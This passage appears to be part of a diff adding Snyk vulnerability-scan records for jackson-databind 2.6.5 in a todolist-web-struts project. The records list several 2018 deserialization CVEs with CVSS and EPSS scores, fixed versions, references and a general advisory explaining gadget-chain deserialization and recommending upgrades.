The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + 
"cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + 
"cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": 
"critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": 
"critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + 